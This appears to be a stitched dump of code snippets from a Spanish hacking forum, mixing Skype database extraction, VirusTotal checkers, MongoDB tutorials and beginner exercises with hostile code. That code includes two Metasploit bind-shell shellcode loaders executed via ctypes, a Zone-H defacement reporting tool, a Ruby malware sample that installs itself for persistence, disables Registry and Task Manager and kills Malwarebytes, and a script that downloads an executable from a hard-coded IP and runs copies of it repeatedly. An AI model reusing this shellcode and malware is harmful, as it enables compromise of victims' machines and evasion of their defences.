        self.__main_conn()
        try:
            #SQL Consult
            self.consult.execute("SELECT datetime(timestamp), \
            dialog_partner, author, body_xml FROM Messages;")
        except:
            print "An error has ocurred doing the SQL consult"

        def __Shower():
            #Showing metainfo
            print "\n- Skype Conversations Details"
            for data in self.consult:
                try:
                    print "---------------------------------------"
                    print "Start of the conversation: " + str(data[0])
                    print "Author: " + str(data[2])
                    print "Receiver: " + str(data[1])
                    if data[3]:
                        print "Message: " + str(data[3].encode('utf-8'))
                    else:
                        print "Message: " + str(data[3])
                    print "---------------------------------------"

                except:
                    continue
                    print "ERROR : An error has ocurred showing the Conversations info"

        __Shower()

    def _Transfer_Details(self):
        self.__main_conn()
        try:
            #SQL Consult
            self.consult.execute("SELECT partner_handle, partner_dispname, datetime(starttime),\
            filepath, filename, filesize FROM transfers;")
        except:
            print "An error has ocurred doing the SQL consult"

        def __Shower():
            #Showing metainfo
            print "\n- Skype Transfers Details"
            for data in self.consult:
                try:
                    print "---------------------------------------"
                    print "File receiver container: " + str(data[0]) + "/" + str(data[1])
                    print "Start time: " + str(data[2])
                    print "File path: " + str(data[3])
                    print "File name: " + str(data[4])
                    print "File size: " + str(data[5])
                    print "---------------------------------------"
                except:
                    continue
                    print "ERROR : An error has ocurred showing the transfers info"

        __Shower()


Skype_Meta_Extractor('main.db')

# -*- coding: utf-8 *-*
#It's a simple script to search the hash of the file in VirusTotal
#and check if your file has been uploaded to VT
#Sanko

import urllib, urllib2, hashlib, sys
import simplejson as json

class VT_File_Checker():

    def __init__(self, apikey, sFileName):
        self.apikey = apikey
        self.sFileName = sFileName
        self._ms_do()

    def _ms_do(self):
        try:
            self.__hash_extractor()
            self._report_check()
            self.__DataShower()
        except:
            print "Error, extracting the hash of the file"

    def _report_check(self):
        url = "https://www.virustotal.com/vtapi/v2/file/report"
        parameters = {"resource": self.md5.hexdigest(), "apikey": self.apikey}
        data = urllib.urlencode(parameters)
        try:
            req = urllib2.Request(url, data)
            response = urllib2.urlopen(req)
            re_json = response.read()
        except:
            print "Error connecting with the VT Api"
            sys.exit(0)
        #Parsing Json Data returned...
        self.report = json.loads(re_json)
        re_scan = self.report["scans"]
        for self.av in re_scan:
            self.detections = re_scan[self.av]["detected"]
            self.results = re_scan[self.av]["result"]
            try:
                self.__parser()
            except:
                print "Error showing the returned data"
                sys.exit(0)

    def __parser(self):
        if self.detections == True:
            print "%s : %s"%(self.av, self.results)
        elif self.detections == False:
            print "%s : Ok"%(self.av)
        else:
            print "ERROR Parsing the scan results"

    def __DataShower(self):
        show = """
Extra Data :
------------
Name : %s
Scan_id : %s
Scan_date : %s
Permalink : %s
--------------
Detections : %s/%s
        """
        print show%(self.sFileName, self.report["scan_id"], self.report["scan_date"],
        self.report["permalink"], self.report["positives"], self.report["total"])


    def __hash_extractor(self):
        #opening sFileName
        sFile = open(self.sFileName, 'rb')
        self.md5 = hashlib.md5()
        while True:
            data = sFile.read(8192)
            if not data:
                break
            self.md5.update(data)
        #self.sha1 = hashlib.sha1()
        #self.sha256 = hashlib.sha256()


VT_File_Checker('Aqui la key api', 'aquituejecutable.exe')

# -*- coding: utf-8 *-*
#It's a simple script to search the hash of the active processes in VirusTotal
#and check if your active processes are uploaded in VT or not
#Sanko

import urllib, urllib2, hashlib, sys, wmi
import simplejson as json

class VT_Process_Checker():

    def __init__(self, apikey, sFileName):
        self.apikey = apikey
        self.sFileName = sFileName
        self._ms_do()

    def _ms_do(self):
        try:
            self.__hash_extractor()
            self._process_report()
            self.__DataShower()
        except:
            pass
    def _process_report(self):
        url = "https://www.virustotal.com/vtapi/v2/file/report"
        parameters = {"resource": self.md5.hexdigest(), "apikey": self.apikey}
        data = urllib.urlencode(parameters)
        try:
            req = urllib2.Request(url, data)
            response = urllib2.urlopen(req)
            re_json = response.read()
        except:
            print "Error connecting with the VT Api"
            sys.exit(0)
        #Parsing Json Data returned...
        self.report = json.loads(re_json)

    def __DataShower(self):
        data = """
---------------------
Name : %s
MD5 Hash : %s
Scan_date : %s
Detections : %s/%s

Permanent Link : %s
---------------------
        """
        print data%(self.sFileName, self.report["md5"], self.report["scan_date"],
        self.report["positives"], self.report["total"], self.report["permalink"])

    def __hash_extractor(self):
        #opening sFileName
        sFile = open(self.sFileName, 'rb')
        self.md5 = hashlib.md5()
        while True:
            data = sFile.read(8192)
            if not data:
                break
            self.md5.update(data)
        #self.sha1 = hashlib.sha1()
        #self.sha256 = hashlib.sha256()

c = wmi.WMI()
for process in c.Win32_Process ():
    if process.executablepath == None:
        continue
        #Into my virtual machine some process have None value
    else:
        try:
            VT_Process_Checker('Aqui tu api', process.executablepath)
        except:
            continue

windows/shell_bind_tcp LPORT=1337 C

msfvenom --payload <ruta_del_payload> --encoder <algoritmo_de_codificacion> --iterations <numero_de_iteraciones_ algoritmo si el las permite > --bad-chars <caracteres_a_ignorar normalmente  recomendado  x00 >

from ctypes import *
 
shellcode = ("\xda\xd7\xd9\x74\x24\xf4\xbd\xf8\xd2\x02\xa0\x5a\x33\xc9" +
"\xb1\x78\x31\x6a\x17\x83\xea\xfc\x03\x92\xc1\xe0\x55\xdc" +
"\x32\x6b\xba\x51\x62\xb4\x1c\xe5\xb0\xc1\xc5\x2e\x70\x98" +
"\x8b\x01\xf0\xc8\xe8\x8b\x08\xed\x9c\x90\x9c\x28\xae\xa2" +
"\x17\xa9\x68\x3b\xd6\x8e\xa4\x3a\x6b\xef\x7d\xbc\x40\xfa" +
"\xf4\xd0\x6e\x8c\x6e\x44\xcc\x7d\xe7\x9d\x5a\x74\xde\x78" +
"\x7d\x3a\x6a\x45\x5a\xa6\x25\xb0\xfb\x36\x1e\x48\xb3\xf6" +
"\xa6\x22\xc6\x85\xe8\x33\x87\xbe\x1d\xfc\xab\x13\x02\xd4" +
"\x82\x2b\xa1\xe5\x3e\x3b\xb5\x51\x33\x50\x16\xa3\xe4\x9f" +
"\x25\xc3\xe8\x89\xd4\xb0\xd1\x83\x50\x20\xcb\x76\x0f\x2d" +
"\x8a\x31\xd9\x3b\xc8\x82\xdd\x65\x94\x57\x04\x3e\x7e\x69" +
"\xa6\x63\xc9\x06\x19\x9d\x49\xe9\x3d\x45\xf5\x19\x5b\xa0" +
"\x8a\x97\x33\xd2\x50\xe6\xff\xc7\xe7\xd6\xb4\x5e\xdd\xcc" +
"\x14\xfd\x18\xc6\xb9\x0c\xd6\xf7\xa4\x9b\xf7\x33\x4d\x56" +
"\xe0\x03\xd8\x8d\xf4\xe9\xde\xa9\xc3\x10\xd5\x8b\xcc\x86" +
"\xf5\x93\x42\x50\x9f\x45\xc9\x10\x4d\x92\x81\xe9\xb1\x85" +
"\xee\x43\xea\x72\x62\x37\x4b\x64\xc5\x0c\xd8\x64\xc0\x38" +
"\xa4\xe1\xad\xf7\xa1\x7e\x50\x52\x72\xac\xef\xd1\x74\x21" +
"\xf3\xe9\xe3\x65\xdb\x26\x48\xd0\x63\x87\x93\x22\x4b\x86" +
"\x0c\x80\x12\x27\x6a\x2e\x1d\x09\x7e\xee\xd1\x0f\xfe\xbe" +
"\x39\x8a\xb2\x55\x03\x4a\xb2\xc2\x79\x36\x9d\xd6\x29\xf4" +
"\xef\x71\xff\xa9\xde\x76\xbd\x62\x60\x52\x12\x8e\x48\x42" +
"\x7d\xaf\x5e\x5d\xc2\xe1\xcb\x39\xee\x86\xe2\x11\x07\xf9" +
"\x6d\x92\xfa\x56\xa2\x1a\xa4\x2d\x2c\x0f\x19\x20\xa2\x34" +
"\x5f\x64\x1a\x05\x87\xe9\xd0\xd5\xa0\xb3\x58\x38\x3b\x2c" +
"\x14\xd0\x74\x16\x46\x7b\x63\xbe\x0c\xae\x08\x9c\x03\x0d" +
"\xed\x06\x99\x2f\xcd\x67\x09\x12\x8c\x29\x6b\x92\x0b\xc5" +
"\x3f\x13\x25\x2a\x77\x5b\xf7\xd8\x63\x87\x46\xb8\xa5\x36" +
"\xc1\xc5\xd5\xcb\x55\xa4\x6f\xd6\x05\x45\x9f\xac\x41\xbe" +
"\xac\xbb\xb8\x03\x46\x04\xde\xd3\x64\x46\x81\x30\x93\x7d" +
"\xd3\x55\x34\xdf\x83\xc4\xde\xf3\x42\x86\x90\xbf\x92\xa0" +
"\x81\xdc\x5e\x05\xc4\x8e\x83\xdb\x6f\x90\xb2\x46\xb1\x2a" +
"\xcd\xd8\x03\x91\xde\x9f\x4e\x05\x75\x2b\x25\x2d\xeb\xfc" +
"\xe5\xa8\x48\xf6\x9f\x77\x8b\xc1\xf4\x78\x0b\xbf\xb4\xc7" +
"\xa6\xb7\x0b\x56\x92\x1b\x40\xc8\x37\x54\xa5\x86\x5b\xaf" +
"\xfd\xab\xa6\x68\xf6\x7b\x0c\xef\x3a\x04\x34\xbe\x55")
 
memoria = create_string_buffer(shellcode, len(shellcode))
shell = cast(memoria, CFUNCTYPE(c_void_p))
shell()

sanko@Sanko-PC ~ $ su
Password:
Sanko-PC sanko # msfconsole

msfpayload windows/shell_bind_tcp LPORT=1337 C

from ctypes import *
 
shellcode = ("\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68"
"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01"
"\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50"
"\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7"
"\x31\xdb\x53\x68\x02\x00\x05\x39\x89\xe6\x6a\x10\x56\x57\x68"
"\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5"
"\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x89\xc7\x68\x75"
"\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57"
"\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01"
"\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e"
"\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56"
"\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56"
"\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75"
"\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5")
 
memoria = create_string_buffer(shellcode, len(shellcode))
shell = cast(memoria, CFUNCTYPE(c_void_p))
shell()

sudo apt-get install python-pip

sudo apt-get install git

sudo apt-get install mercurial

tar xzvf Django-1.3.5.tar.gz
cd Django-1.3.5
sudo python setup.py install

pip install hg+https://bitbucket.org/wkornewald/django-nonrel

pip install hg+https://bitbucket.org/wkornewald/djangotoolbox

pip install git+https://github.com/django-nonrel/mongodb-engine

sudo apt-get install pymongo

from pymongo import Connection

conex = Connection('localhost') 

db = conex.nombredb

collect = db.coleccionnueva

db.collection_names()

collect.insert({"name":"sanko","twitter":"sankoSK"})

collect.update()

collect.find()

collect.remove()

collect.drop()

use nuestrabd
db.dropDatabase()

conex.drop_database('nombredatabase')

#	Probaremos los codes , asi que los pondremos todos
#	Coded by Sanko
#	Haremos lo siguiente :
#		-Conectaremos con la BD
#		-Veremos las BD's que tenemos creadas
#		-Veremos las colecciones que ya tenemos creadas
#		-Crearemos una nueva BD
#		-Crearemos una nueva coleccion
#		-Insertaremos nuevos documentos
#		-Actualizaremos documentos
#		-Borraremos documentos con remove y drop

#	Simple MongoDB-Manager using pymongo - Sanko

from pymongo import Connection

def mongomanager():

	conex = Connection('localhost')

	def databases():
		print "Control de BD's , Que deseas hacer?"
		entrada = raw_input("- [1]Visualizar BD's | [2]Crear BD's | [3]Borrar BD's | [4]Home -> ")
		if entrada == '1':
			var = conex.database_names()
			print var
			databases()
		elif entrada == '2':
			name = raw_input("Nombre de la BD que quieres crear -> ")
			global db 
			db = conex.name
			databases()
		elif entrada == '3':
			delname = raw_input("Nombre de la BD que quieres eliminar -> ")
			conex.drop_database(delname)
			databases()
		elif entrada == '4':
			mongomanager()
		else:
			print "Error\n"
			mongomanager()

	def collections():
		print "Control de Colecciones , que deseas hacer?"
		entrada = raw_input("- [1]Visualizar colecciones | [2]Crear coleccion | [3]Home -> ")
		if entrada == '1':
			var = db.collection_names()
			print var
			collections()
		elif entrada == '2':
			global collectname 
			collectname = raw_input("Nombre de la coleccion que quieres crear -> ")
			collect = db.collectname
			collections()
		elif entrada == '3':
			mongomanager()
		else:
			print "error\n"
			mongomanager()

	def documents():
		print "Control de Documentos , que deseas hacer?"
		entrada = raw_input("[1]Crear documento | [2]Busqueda de documentos | [3]Eliminar documento | [4]Home -> ")
		if entrada == '1':
			#Escriba el contenido de esta manera "name":"sanko" por ejemplo.
			document = raw_input("Escriba el contenido del doc => ")
			collectname.insert({"name":"sankito"})
			documents()
		elif entrada == '2':
			content = raw_input("Parametros del contenido -> ")
			var = collectname.find(content)
			print var
			documents()
		elif entrada == '3':
			choosedel = raw_input("Desea vaciar el documento(1) o borrar algo especifico(2) -> ")
			if choosedel == '1':
				collectname.drop()
				documents()
			elif choosedel == '2':
				delcontent = raw_input("Parametros del borrado -> ")
				collectname.remove(delcontent)
				documents()
			else:
				print "error\n"
				documents()
		else:
			print "error\n"
			mongomanager()

	entrada = raw_input("PyMongo Manager => Exit(0) | Control BD's(1) | Control Colecciones(2) | Control de Documentos(3) -> ")
	if entrada == '0':
		exit
	elif entrada == '1':
		databases()
	elif entrada == '2':
		collections()
	elif entrada == '3':
		documents()
	else:
		print "Error\n"
		mongomanager()

mongomanager()

sudo apt-get install mongodb

mongo

use nombredb

show dbs

db.nombrecoleccion #asi creamos la coleccion
db.nombrecoleccion.insert({"name":"sanko","twitter":"sankoSK"})

show collections

db.nombrecoleccion.find()

db.nombrecoleccion.insert({"color":"azul","material":"metal"})
db.nombrecoleccion.find({"color":"azul"})

db.nombrecoleccion.findOne()

db.nombrecoleccion.count()

db.nombrecoleccion.update({"name":"sanko"}, {$set:{"other":"fuckthishit"}})

db.nombrecoleccion.remove()

db.nombrecoleccion.insert({"name":"sanko"})
db.nombrecoleccion.insert({"color":"rojo"})
db.nombrecoleccion.remove({"color":"rojo"})

db.nombrecoleccion.drop()

#########################
#		S A N K O		        #
#						            #
#	!/usr/bin/python	    #
#  Zone-H Reporter v0.5	#
#########################


#Uso : 
	# login('user','password')
	# uploadsingle(params)
	# uploadmass(params)

#Aclaracin : 
  #Los except los dejo a gusto de cada uno , indicar el que mas os convenga


import urllib,urllib2

def zoneh():
  main()

  def main():
    print """
@@@@@@@  @@@@   @    @  @@@@@           @    @          @@@@@   @@@@@   @@@@@    @@@@   @@@@@   @@@@@   @@@@@   @@@@@  |
     @  @    @  @@   @  @               @    @          @    @  @       @    @  @    @  @    @    @     @       @    @ | 	  Visit
    @   @    @  @@   @  @               @    @          @    @  @       @    @  @    @  @    @    @     @       @    @ |
   @    @    @  @ @  @  @               @    @          @    @  @       @    @  @    @  @    @    @     @       @    @ |  www.underc0de.org
  @     @    @  @ @  @  @@@@            @@@@@@          @@@@@   @@@@    @@@@@   @    @  @@@@@     @     @@@@    @@@@@  | 
 @      @    @  @  @ @  @               @    @          @    @  @       @       @    @  @    @    @     @       @    @ |
@       @    @  @   @@  @               @    @          @    @  @       @       @    @  @    @    @     @       @    @ | Underc0de Team
@       @    @  @   @@  @               @    @          @    @  @       @       @    @  @    @    @     @       @    @ | -------------------
@@@@@@@  @@@@   @    @  @@@@@           @    @          @    @  @@@@@   @        @@@@   @    @    @     @@@@@   @    @ | V.0.5 By Sanko\n"""

    options = """
#########################
#						            #
#	  Zone-H Reporter	    #
#		  V.0.5			        #
#						            #
#	[+] OPTIONS [+]		    #
#-----------------------#
#	[1] login			        #
#	[2] Single Deface 	  #
#	[3] Mass deface     	#
#	[i] Info Methods    	#
#					            	#
#########################\n"""
	
    print options
    entra = raw_input("Choose an option -> ")

    if entra == 1:
      login('user','password')

    elif entra == 2:
      uploadsingle('defacer','domain','hackmode','reason')

    elif entra == 3:
      uploadmass('defacer','hackmode','reason') #Rellena los dominios en def uploadmass()

    elif entra == 'i':
      info()

    else:
      print "Error , try again\n"
      main()

  def login(user,password):
    try:
			url = 'http://www.zone-h.org/notify/single'
			values = {'user':user,
					  'password':password}

			data =urllib.urlencode(values)
			req = urllib2.Request(url, data)
			resp = urllib2.urlopen(req)
			page = resp.read()
			print page

		except:
			entrada = raw_input("Error , Desea volver a intentar loguearse? |si| o |no| -> ")
			if entrada == 'si':
				login('user','pass')

			elif entrada == 'no':
				main()

			else:
				print "Error , Saliendo del programa..."
				exit

	def uploadsingle(defacer,domain,hackmode,reason):
		try:
			url = 'http://www.zone-h.org/notify/single'
			values = {'defacer':defacer,
					  'domain1':domain,
            'hackmode':hackmode,
            'reason':reason,
            'submit':'Send'}
      data =urllib.urlencode(values)
			req = urllib2.Request(url, data)
			resp = urllib2.urlopen(req)
			page = resp.read()
			print page

		except:
			entrada = raw_input("Ha ocurrido un Error , deseas volver a realizar la acción?  |si| o |no| -> ")
			if entrada == 'si':
				uploadsingle('defacer','domain.com','hackmode','reason')

			elif entrada == 'no':
				main()

			else:
				print "Error , Saliendo del programa..."
				exit

	def uploadmass(defacer,hackmode,reason):
		try:
        url = 'http://www.zone-h.org/notify/mass'
        values = {'defacer':defacer,
                  'domain1':'',
                  'domain2':'',
                  'domain3':'',
                  'domain4':'',
                  'domain5':'',
                  'domain6':'',
                  'domain7':'',
                  'domain8':'',
                  'domain9':'',
                  'domain10':'',
                  'domain1':domain,
                  'hackmode':hackmode,
                  'reason':reason,
                  'submit':'Send'}
     
        data = urllib.urlencode(values)
        req = urllib2.Request(url, data)
        resp = urllib2.urlopen(req)
        page = resp.read()
        print page

      except:
        entrada = raw_input("Ha ocurrido un Error , deseas volver a realizar la acción?  |si| o |no| -> ")
        if entrada == 'si':
          uploadmass(defacer,hackmode,reason)

        elif entrada == 'no':
        	main()

        else:
				  print "Error , Saliendo del programa..."
				  exit

    def info():
      hackmodes = """
[1] known vulnerability (i.e. unpatched system)
[2] undisclosed (new) vulnerability
[3] configuration / admin. mistake
[4] brute force attack
[5] social engineering
[6] Web Server intrusion
[7] Web Server external module intrusion
[8] Mail Server intrusion
[9] FTP Server intrusion
[10] SSH Server intrusion
[11] Telnet Server intrusion
[12] RPC Server intrusion
[13] Shares misconfiguration
[14] Other Server intrusion
[15] SQL Injection
[16] URL Poisoning
[17] File Inclusion
[18] Other Web Application bug
[19] Remote administrative panel access through bruteforcing
[20] Remote administrative panel access through password guessing
[21] Remote administrative panel access through social engineering
[22] Attack against the administrator/user (password stealing/sniffing)
[23] Access credentials through Man In the Middle attack
[24] Remote service password guessing
[25] Remote service password bruteforce
[26] Rerouting after attacking the Firewall
[27] Rerouting after attacking the Router
[28] DNS attack through social engineering
[29] DNS attack through cache poisoning
[30] Not available
[31] Cross-Site Scripting\n"""
     
      reasons = """
[1] Heh...just for fun!
[2] Revenge against that website
[3] Political reasons
[4] As a challenge
[5] I just want to be the best defacer
[6] Patriotism
[7] Not available\n"""
      entrada = raw_input("info about |hackmodes| or |reasons| -> ")
      if entrada == "hackmodes":
        print hackmodes
      elif entrada == "reasons":
        print reasons
      else:
        print "Error"
        main()

zoneh()

/* Accion cada X segundos By Sanko - C */
/* Uso -> delay(parametro) */
#include <stdio.h>

void delay(int time)
	{
	while(0<10)
		{
		sleep(time);
		printf("hola sankito");
		}
	}

int main()
	{
	delay(3);
	return 0;
	}

###################
#!/usr/bin/python #
# Zone-H Reporter #
# Coded by Sanko  #
###################

import urllib,urllib2

def main():
	options = """
#######################
#		      #
#  Zone - H Reporter  #
#  [0] Login          #
#  [1] Single Deface  #
#  [2] Mass Deface    #
#  [i] info methods   #
#	              #
#######################"""

	print options
	entrada = raw_input("Choose an option -> ")
	if entrada == 0:
		login('user','password')
	elif entrada == 1:
		uploadsingle('defacer','http://web.com/','15','1')
	elif entrada == 2:
		uploadmass('defacer','15','1') #Deben indicar en la funcion los domains defaceados
	elif entrada == 'i':
		info()
	else:
		print "Error , try again\n"
		main()

def login(user,password):
	url = 'http://www.zone-h.org/login'
	values = {'user':user,
		 'password':password}

	data = urllib.urlencode(values)
	req = urllib2.Request(url, data)
	resp = urllib2.urlopen(req)
	page = resp.read()
	print page

def uploadsingle(defacer,domain,hackmode,reason):
	url = 'http://www.zone-h.org/notify/single'
	values = {'defacer':defacer,
	          'domain1':domain,
	          'hackmode':hackmode,
		  'reason':reason,
		  'submit':'Send'}

	data = urllib.urlencode(values)
	req = urllib2.Request(url, data)
	resp = urllib2.urlopen(req)
	page = resp.read()
	print page


def uploadmass(defacer,hackmode,reason):
	url = 'http://www.zone-h.org/notify/mass'
	values = {'defacer':defacer,
		  'domain1':'',
		  'domain2':'',
		  'domain3':'',
		  'domain4':'',
		  'domain5':'',
		  'domain6':'',
		  'domain7':'',
		  'domain8':'',
		  'domain9':'',
		  'domain10':'',
	          'domain1':domain,
	          'hackmode':hackmode,
		  'reason':reason,
		  'submit':'Send'}

	data = urllib.urlencode(values)
	req = urllib2.Request(url, data)
	resp = urllib2.urlopen(req)
	page = resp.read()
	print page

def info():
	hackmodes = """
	[1] known vulnerability (i.e. unpatched system)
	[2] undisclosed (new) vulnerability
	[3] configuration / admin. mistake
	[4] brute force attack
	[5] social engineering
	[6] Web Server intrusion
	[7] Web Server external module intrusion
	[8] Mail Server intrusion
	[9] FTP Server intrusion
	[10] SSH Server intrusion
	[11] Telnet Server intrusion
	[12] RPC Server intrusion
	[13] Shares misconfiguration
	[14] Other Server intrusion
	[15] SQL Injection
	[16] URL Poisoning
	[17] File Inclusion
	[18] Other Web Application bug
	[19] Remote administrative panel access through bruteforcing
	[20] Remote administrative panel access through password guessing
	[21] Remote administrative panel access through social engineering
	[22] Attack against the administrator/user (password stealing/sniffing)
	[23] Access credentials through Man In the Middle attack
	[24] Remote service password guessing
	[25] Remote service password bruteforce
	[26] Rerouting after attacking the Firewall
	[27] Rerouting after attacking the Router
	[28] DNS attack through social engineering
	[29] DNS attack through cache poisoning
	[30] Not available
	[31] Cross-Site Scripting"""

	reasons = """
	[1] Heh...just for fun!
	[2] Revenge against that website
	[3] Political reasons
	[4] As a challenge
	[5] I just want to be the best defacer
	[6] Patriotism
	[7] Not available"""
	
	entrada = raw_input("info hackmodes | info reasons   --- > ")
	if entrada == "hackmodes":
		print hackmodes
	elif entrada == "reasons":
		print reasons
	else:
		print "Error"
		

main()

#Reto de programacion , Difucultad? -> Sencilla
#Comprueba que el primer caracter de la variable 'a' sea 'h'
#Si lo es imprime 'Correcto' si no lo es imprime 'Incorrecto'

a = raw_input("Escribale un valor a la variable a : -> ")

if a.startswith('h'):
	print "Correcto el primer caracter es una h"
else:
	print "Incorrecto el primer caracter no es una h"

#Reto de programacion , Difucultad? -> Sencilla
#Comprueba que el primer caracter de la variable 'a' sea 'h'
#Si lo es imprime 'Correcto' si no lo es imprime 'Incorrecto'

print "Escribale un valor a la variable a :\n"
a = gets.chomp

if a.match(/^h/)
	puts 'Correcto el primer caracter es una h'
else
	puts 'Incorrecto el primer caracter no es una h'
end

<?php
$cadena = "hola"; 
echo 'la palabra es '.$cadena.'<br />':
 
if($cadena['0'] == "h")
{
echo "correcto! la primera letra es h";
} else {
echo "Incorrecto";
}
?>

program Untitled;
uses crt;
var palabra:string;
begin
writeln('Introducir palabra');
read(palabra);
if (palabra[1]) = 'h' then
write('Primera letra es H, correcto') else
write('Primera letra NO es H, incorrecto');
repeat until keypressed
end.

    package Programacion;
     
    import java.util.Scanner;
     
    public class RetoSanko {
     
            /**
             * @param args
             */
            public static void main(String[] args) {
     
                     Scanner sc = new Scanner(System.in);
                     System.out.println("Ingrese la palabra con la condición secreta");
                     String palabra = sc.nextLine().toUpperCase();
                     if(palabra.startsWith("H"))
                             System.out.println("La palabra ingresada es correcta");
                     else
                             System.out.println("La palabra ingresada no es correcta");
            }
     
    }

Sub Main()
Dim cadena As String
cadena = "hola"
If Left(cadena, 1) = "h" Then
MsgBox "La palabra comienza por h", vbInformation, "Comprobador"
Else
MsgBox "La palabra no comienza por h", vbExclamation, "Comprobador"
End If
End Sub

<script>
var texto = prompt("Escribe una palabra:");
if(texto.substr(0, 1) == "h"){
	alert("Empieza con h");
}else{
	alert("No empieza con h");
}
</script>

#include <iostream.h>
using namespace std;
int main (void)
{
    char l[10];
    l[0] = 'h';
    l[1] = 'y';
    l[2] = 'd';
    l[3] = 'r';
    l[4] = 's';
    l[5] = 'c';
    l[6] = 'u';
    l[7] = 't';
    l[8] = 'z';
    l[9] = 'w';
    l[10] = 'z';
    
    char x;
    
    cin>> x;
    
    
    if(x == 'h')
    {
       cout<<"comienza con h";
       
        
        }
        
        else
        {
           cout<<"no comienza con h"; 
            }
    
    system("pause >>nul");
    
    
}

package javaapplication52;
import javax.swing.JOptionPane;
public class JavaApplication52 {

    public static void main(String[] args) {
        String Texto="";
        Texto=JOptionPane.showInputDialog("Ingrese Una Frase");
        char Text[] = new char [Texto.length()];
        for (int i = 0; i < Texto.length(); i++) {
            Text[i] = Texto.charAt(i);
        }
        if (Text[0] == 'h') {
            JOptionPane.showMessageDialog(null, "Correcto");
        }else{
            JOptionPane.showMessageDialog(null, "Incorrecto");
        }
    }
}

############################################################################################################
#                                                                                                          #
# Iceberg Tool Ruby Version  -  Using Malwarebytes like example...																		   #
# Coded by Sanko 																						   #
# Advertencia : Esta version del Iceberg es una SIMPLE TRADUCCION de Iceberg Tool Generator Public Version #
# Lo que significa que no es capaz de evadir a los Antivirus mas actualizados asi como Kaspersky o Nod 32  #
# Para evadirlos existe el Iceberg worm que estan desarrollando Velario y Slore -> IcebergWorm.es          #
#                                                                                                          #
############################################################################################################

require "win32ole"
require 'win32/registry'
require 'ftools'

def killprocess(process)
	require "win32ole"
    var = WIN32OLE.connect("winmgmts://")
    kill = var.ExecQuery("select * from Win32_process where name='#{process}'")
    kill.each do |proceso|
    	proceso.Terminate
    end
end

def deshabilitarreg()
	system('REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /F')
end

def deshabilitartaskman()
	system('REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 0 /F')
end

def autocopy()
	File.copy('Iceberg.exe', 'C:\WINDOWS\system32\iceberg.exe')
end

def registrar()
	runrute = 'Software\Microsoft\Windows\CurrentVersion\Run'
	folderkey = 'iceberg'
	Win32::Registry::HKEY_CURRENT_USER.open(Run_branch , Win32::Registry::Constants::KEY_ALL_ACCESS) do |reg|
		reg[folderkey] = 'C:\WINDOWS\system32\iceberg.exe'
	end
	autocopy()
	deshabilitarreg()
	deshabilitartaskman()
end

def autokill()
	killprocess('mbam.exe')
	killprocess('mbamgui.exe')
	killprocess('mbampt.exe')
	killprocess('mbamscheduler.exe')
	killprocess('mbamservice.exe')
	killprocess('mbam-chamaleon.exe')
	killprocess('mbam-killer.exe')
end

def main()
	var = 0
	registrar()
	while var < 10
		autokill()
	end
end

main()

def killprocess(process)
	require "win32ole"
    var = WIN32OLE.connect("winmgmts://")
    kill = var.ExecQuery("select * from Win32_process where name='#{process}'")
    kill.each do |proceso|
    	proceso.Terminate
    end
end
killprocess('notepad.exe')

#Clonador de Malware - Python Code Example
#Coded by Sanko

import os
import urllib
import time

filedown = 'C:\sk.exe' #var con archivo a descargar
url = 'http://199.91.152.68/cd89ww7cb6jg/67fcyfx9xsf31mz/sk.exe' #Var con url de descarga
fileacopiar = filedown
clon = 'C:\sk\skclon.exe' #ruta en la que el clon se copiara
timeclon = 5 #marcamos el tiempo del sleep

def copy():
	os.system('copy ' + fileacopiar + ',' + clon) #Copiamos el archivo en el directorio del clon

def execute():
	os.system(clon) #Ejecutamos al clon

def down(): #Descargamos el file
	archivo = urllib.urlretrieve(url,filedown)
	os.system(clon)

def executeandcopy():
	var = 0
	while var < 10:
		time.sleep(timeclon) #Cada timeclon segundos...
		copy() #ejecutamos funcion copy
		execute() #ejecutamos funcion execute

down() #ejecutamos funcion down
executeandcopy() #ejecutamos funcion executeandcopy